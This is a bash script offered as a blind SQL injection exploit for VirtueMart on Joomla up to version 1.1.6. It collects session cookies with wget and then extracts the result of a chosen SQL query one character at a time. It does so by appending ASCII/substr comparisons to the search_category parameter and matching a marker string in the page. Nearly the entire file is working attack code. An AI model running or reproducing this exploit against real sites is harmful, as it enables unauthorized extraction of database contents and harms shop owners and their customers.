#!/bin/bash
#
# VirtueMart eCommerce for JOOMLA <= 1.1.6 BLIND SQL INJECTION EXPLOIT
# by Andrea Fabrizi
# http://www.andreafabrizi.it

#IMPORTANT: search_category must be the LAST parameter in the query string
URL="http://127.0.0.1/index.php?page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search_op=and&&search_limiter=anywhere&search=Search&search_category=3"

#SQL query to enumerate
QUERY="select database()" 

#String to match in the page when the query is valid (e.g. and 1=1)
TXT_CONTROL="Ladder"  

CHARSET="a b c d e f g h i l m n o p q r s t u v z w y k j x 1 2 3 4 5 6 7 8 9 0 A B C D E F G H I L M N O P Q R S T U V Z W Y K J X . _ \! \: \/ \\ \#"

echo -ne "- Getting cookies... "
wget -O /dev/null --user-agent="null" --quiet --keep-session-cookies --save-cookies=/tmp/sqlcookie "$URL"
if [ $? -eq 0 ]; then
    echo -e "OK\n- Starting enumeration...\n"
else
    echo -e "Error!"
    exit 1
fi

j=0
while (true); do
    let j=$j+1
    echo -e -n "$j) ";
    found=0
    
    for i in $CHARSET; do
    
        echo -n "."
        n=$(printf '%x' "'$i")
        RES=$(wget -O - --user-agent="null" --quiet --load-cookies=/tmp/sqlcookie "$URL and ASCII(substr(($QUERY),$j,1))=0x$n -- " | grep "$TXT_CONTROL")
 
      if [ "$RES" != "" ]; then
            echo -e " -> $i"
            found=1
            RESULT="${RESULT}$i"
            break;
        fi;
        
    done;
    
    if [ $found -ne 1 ]; then
        break;
    fi
    
done;

echo -e "\n\n -> $RESULT\n"